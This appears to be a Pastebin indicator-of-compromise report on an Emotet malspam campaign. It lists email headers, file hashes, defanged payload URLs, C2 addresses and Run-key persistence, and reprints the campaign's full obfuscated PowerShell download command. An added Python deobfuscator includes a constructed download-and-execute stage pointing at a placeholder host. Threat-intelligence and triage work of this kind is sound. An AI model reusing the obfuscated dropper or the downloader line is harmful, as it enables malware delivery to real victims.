#emotet_091118

VRad Nov 9th, 2018 (edited) 596 Never
#IOC #OptiData #VR #Emotet #Banker #Feodo #W97M #Powershell

https://pastebin.com/THHMs2wg
other_Emotet_IOCs:
https://pastebin.com/KVNyw9Uq
https://pastebin.com/L2nSzNU4
previous contact:
https://pastebin.com/Y6DnbpHv
FAQ:
https://radetskiy.wordpress.com/2018/10/19/ioc_emotet_011018/
https://kc.mcafee.com/corporate/index?page=content&id=KB90108

attack_vector
--------------
email attach .doc > macro > powershell > GET > %temp%\*.exe

email_headers
--------------
Received: from public-swhrmf-2c.serverdata.net (public-swhrmf-2c.serverdata.net [64.78.61.27])
Received: from public-swhrmf-2c.serverdata.net ([64.78.61.27])
Received: from mail12.intermedia.net (unknown [64.78.61.134])
Date: Fri, 09 Nov 2018 03:44:58 -0300
From: Интернет-магазин С торгом <info@storgom.ua> <auxiliaradmon1@ravisa.com>
To: user0@hq.88.victim.com
Subject: Интернет-магазин С торгом: Order receipt #4553
(the display name "Интернет-магазин С торгом" is Russian for "Online store S torgom", the brand behind storgom.ua; headers kept verbatim as indicators)

files
--------------
SHA-256 af2b3dd1afe2b337ea192b9443f4368cc8c6e488d9913fe1ac64ac55e9bb49c8
File name   FILE-901171445210110.doc
File size   71.13 KB

SHA-256 9ff551c66e520652a8f1e1ea832a1e361b9a4d877acf1c4fb6001366fbc2ef3d
File name   extr
File size   132 KB

SHA-256 db04c89d578d8796007591e2f9c5c0b306fdbf13351232bad8c9fa2acd08e050
File name   WCPDll
File size   357.5 KB

activity
**************

payload_src
--------------
h11p\мягкое-стекло{.} рф/OYRECjhJU    404
h11p\sastudio{.} co/GgGV3mOVlN      200
h11p\priscawrites{.} com/tS6M2ffhC  200
h11p\gbsbrows{.} com/JZLqJd4        200
h11p\evelin{.} ru/fgARtN6g      404

netwrk
--------------
132.148.254.223 gbsbrows{.} com     GET /JZLqJd4    HTTP/1.1    no User Agent  
187.163.174.149 187.163.174.149:8080    GET /       HTTP/1.1    Mozilla/4.0

comp
--------------
powershell.exe  2604    132.148.254.223 80  ESTABLISHED
colorerkey.exe  2656    187.163.174.149 8080    ESTABLISHED

proc
--------------
"C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
C:\Windows\SysWOW64\CMD.exe CMD c:\wiNdoWS\SySTem32\CMd   /c"SEt   vmN=.( $sHELLId[1]+$sHeLlid[13]+'x') ...
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOwERsHEll      .  (\"{1}{0}{2}\" -f 'I','SET-','tem') (  \"{0}{3}{1}{2}\"-f'vARI','lE',':0SkX','ab' ...
"C:\tmp\862.exe"
"C:\Users\operator\AppData\Local\Microsoft\Windows\colorerkey.exe"

*obfuscated download command:
--------------
/c"SEt   vmN=.( $sHELLId[1]+$sHeLlid[13]+'x')( New-oBJEct io.coMpREsSioN.dEFLatEstREAM([iO.MEmorysTREAm] [COnVERt]::FrOMbaSe64sTrINg( 'NZDdasJAEIVfJRcLq1g3VEsoLgGLVlFaBaX2h95kk0l2NdlNk4lrG3z3JrbO5fnOHOYMqaLC12D7RuwhRGcFyF5BTFIFGjmZTn98KhHzkesmohSFsSULTeYuP56+ltHd+J9Za1kZlFhFyjTcnSfz3TBb79LV1XHS/WYARSJsJEUVD4PM06yV89tAuev3zeNkL5cv1wU4Qqo0Kyo3Th42uPKSK8kLVYaBLRTC3zG49Z4HcSwnlG3zVGGHjmmXk7do5vgOvfcGlJNoM/MJ6OMIIct79JP2Wt6jDE5AeWwKCELZIVhKR2mnLd6tsfiuSfMgNjVWpyaIZiqFi+fGaQO7fKGP5gD9RRN6Ubhocg78HAYYyvp8/gU=' ) , [sYstem.io.COMPressIoN.ComPrESSIonMOdE]::DeCOMPress ) ^| % {New-oBJEct  syStem.io.STreAmrEadEr( $_, [SYsTEM.tExT.EnCOdiNg]::aScII)}^| %{ $_.reAdTOeND()}) && pOwERsHEll     .  (\"{1}{0}{2}\" -f 'I','SET-','tem') (  \"{0}{3}{1}{2}\"-f'vARI','lE',':0SkX','ab'  )  (   [tYPE]( \"{0}{1}{2}\"-f 'E','N','VirOnment' ) ) ;   ( ^& (\"{1}{0}{2}\" -f'ARIA','V','blE' ) (  \"{1}{0}\" -f 'X*xT','E')).\"Val`UE\".\"INvo`kECOmM`AND\".(\"{1}{2}{3}{0}\" -f'PT','in','Vok','ESCri'  ).Invoke(  (  (   .('Gi' )  (  \"{0}{1}{2}\" -f 'VArIA','bLE:0S','kx')).\"Val`Ue\"::(  \"{4}{1}{0}{2}{5}{3}\"-f 'E','t','nvIro','eNtVARIAbLE','ge','nM').Invoke(  'VmN',(\"{1}{0}{2}\" -f 'RoCE','P','ss'  )  ) )   )"
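The command above stacks three cheap tricks. PowerShell's -f operator reorders quoted fragments into cmdlet and member names ("{1}{0}{2}" -f 'I','SET-','tem' is SET-Item), backticks are sprinkled inside member names ("Val`UE"), and $sHELLId[1]+$sHeLlid[13]+'x' spells iex because $ShellId is always "Microsoft.PowerShell". The first half inflates a base64/DEFLATE blob and stores the result in the cmd variable vmN; the second half, once unfolded, reads Set-Item Variable:0SkX ([type]Environment); (& Variable EX*xT).Value.InvokeCommand.InvokeScript((Get-Item Variable:0SkX).Value::GetEnvironmentVariable('VmN','Process')), i.e. it executes whatever cmd left in the vmN environment variable. The Python below is an added example and not part of the paste: the second stage is the paste's own text, the first-stage payload is a constructed placeholder with a made-up example.invalid URL (the real blob is not decoded here; pass the real command line to deobfuscate() to inflate it), and the $ShellId value is the stock one.

```python
"""Undo the obfuscation layers of the paste's cmd /c ... && powershell ... line."""
import base64
import re
import zlib

# $ShellId is "Microsoft.PowerShell" in every stock host, so
# $ShellId[1]+$ShellId[13]+'x' is 'i'+'e'+'x' == iex (Invoke-Expression).
SHELL_ID = "Microsoft.PowerShell"

SHELLID_EXPR = re.compile(r"\$shellid\[\d+\](?:\s*\+\s*(?:\$shellid\[\d+\]|'[^']*'))*", re.I)
# ("{1}{0}" -f 'a','b'), with or without the cmd-escaped \" seen in the paste.
FORMAT_OP = re.compile(r"""\\?"((?:\{\d+\})+)\\?"\s*-f\s*((?:'[^']*'\s*,\s*)*'[^']*')""")
B64_ARG = re.compile(r"frombase64string\(\s*'([A-Za-z0-9+/=]+)'", re.I)


def resolve_shellid_expr(expr: str) -> str:
    """'$sHELLId[1]+$sHeLlid[13]+'x'' -> 'iex'."""
    parts = []
    for idx, lit in re.findall(r"\$shellid\[(\d+)\]|'([^']*)'", expr, flags=re.I):
        parts.append(SHELL_ID[int(idx)] if idx else lit)
    return "".join(parts)


def ps_format(template: str, args: list) -> str:
    """Emulate PowerShell's -f operator for bare {n} placeholders."""
    return re.sub(r"\{(\d+)\}", lambda m: args[int(m.group(1))], template)


def resolve_format_ops(text: str) -> str:
    """Replace every ("{1}{0}" -f 'a','b') with the literal it builds."""
    def repl(m):
        args = re.findall(r"'([^']*)'", m.group(2))
        return "'" + ps_format(m.group(1), args) + "'"
    return FORMAT_OP.sub(repl, text)


def strip_backticks(text: str) -> str:
    """"Val`UE" -> "ValUE". Only safe for member names: a real escape such as
    `n would lose its meaning, which does not occur in this sample."""
    return re.sub(r"`(?=[A-Za-z0-9])", "", text)


def decode_deflate_b64(blob: str) -> str:
    """[Convert]::FromBase64String -> DeflateStream(Decompress) -> ASCII StreamReader.
    DeflateStream is raw DEFLATE without a zlib header, hence wbits=-15."""
    return zlib.decompress(base64.b64decode(blob), -15).decode("ascii")


def encode_deflate_b64(text: str) -> str:
    """Inverse of decode_deflate_b64; used only to build the constructed sample."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)
    return base64.b64encode(comp.compress(text.encode("ascii")) + comp.flush()).decode("ascii")


def deobfuscate(cmdline: str) -> dict:
    """Return the inflated stage-1 blob (if any) and the unfolded stage-2 text."""
    stage1 = None
    m = B64_ARG.search(cmdline)
    if m:
        stage1 = decode_deflate_b64(m.group(1))
    stage2 = resolve_format_ops(cmdline)
    stage2 = strip_backticks(stage2)
    stage2 = SHELLID_EXPR.sub(lambda m: resolve_shellid_expr(m.group(0)), stage2)
    return {"stage1": stage1, "stage2": stage2}


# Constructed stage 1 (NOT the content of the paste's blob): a minimal downloader
# of the shape the attack_vector line describes, with a made-up URL.
STAGE1_CONSTRUCTED = ("$u='http://example.invalid/payload';$p=$env:TEMP+'\\862.exe';"
                      "(New-Object Net.WebClient).DownloadFile($u,$p);Start-Process $p")

# The paste's own second stage, verbatim (cmd-escaped quotes and ^& intact).
STAGE2_FROM_PAGE = r"""pOwERsHEll     .  (\"{1}{0}{2}\" -f 'I','SET-','tem') (  \"{0}{3}{1}{2}\"-f'vARI','lE',':0SkX','ab'  )  (   [tYPE]( \"{0}{1}{2}\"-f 'E','N','VirOnment' ) ) ;   ( ^& (\"{1}{0}{2}\" -f'ARIA','V','blE' ) (  \"{1}{0}\" -f 'X*xT','E')).\"Val`UE\".\"INvo`kECOmM`AND\".(\"{1}{2}{3}{0}\" -f'PT','in','Vok','ESCri'  ).Invoke(  (  (   .('Gi' )  (  \"{0}{1}{2}\" -f 'VArIA','bLE:0S','kx')).\"Val`Ue\"::(  \"{4}{1}{0}{2}{5}{3}\"-f 'E','t','nvIro','eNtVARIAbLE','ge','nM').Invoke(  'VmN',(\"{1}{0}{2}\" -f 'RoCE','P','ss'  )  ) )   )"""


def build_sample_cmdline(stage1: str) -> str:
    """Wrap stage1 exactly the way the paste does, with the blob swapped."""
    blob = encode_deflate_b64(stage1)
    return ("SEt   vmN=.( $sHELLId[1]+$sHeLlid[13]+'x')( New-oBJEct io.coMpREsSioN.dEFLatEstREAM("
            "[iO.MEmorysTREAm] [COnVERt]::FrOMbaSe64sTrINg( '" + blob + "' ) , "
            "[sYstem.io.COMPressIoN.ComPrESSIonMOdE]::DeCOMPress ) ^| % {New-oBJEct  syStem.io.STreAmrEadEr("
            " $_, [SYsTEM.tExT.EnCOdiNg]::aScII)}^| %{ $_.reAdTOeND()}) && " + STAGE2_FROM_PAGE)


if __name__ == "__main__":
    result = deobfuscate(build_sample_cmdline(STAGE1_CONSTRUCTED))
    print("stage1:", result["stage1"])
    print("stage2:", result["stage2"])
```

The stage-2 output still carries the cmd escaping (\" and ^&); what matters for triage is that the cmdlet names (SET-Item, VARIAblE, GetEnvironmentVariable, InvokeScript) become greppable, which is also what an EDR rule should key on rather than on the randomised casing.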

persist
--------------
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run              09.11.2018 14:52   
colorerkey  Windows Componentization Platform Servicing API Microsoft Corporation  
c:\users\operator\appdata\local\microsoft\windows\colorerkey.exe    09.11.2018 14:45

drop
--------------
C:\tmp\862.exe
C:\Users\operator\AppData\Local\Microsoft\Windows\colorerkey.exe

# # #
doc -   https://www.virustotal.com/#/file/af2b3dd1afe2b337ea192b9443f4368cc8c6e488d9913fe1ac64ac55e9bb49c8/details
exe -   https://www.virustotal.com/#/file/9ff551c66e520652a8f1e1ea832a1e361b9a4d877acf1c4fb6001366fbc2ef3d/details
        https://analyze.intezer.com/#/analyses/c028884b-15ca-4bda-abd0-a22d511fe240
exe#2   -   https://www.virustotal.com/#/file/db04c89d578d8796007591e2f9c5c0b306fdbf13351232bad8c9fa2acd08e050/details
        https://analyze.intezer.com/#/analyses/01b66204-33f5-4128-8f0f-11db305a3101
@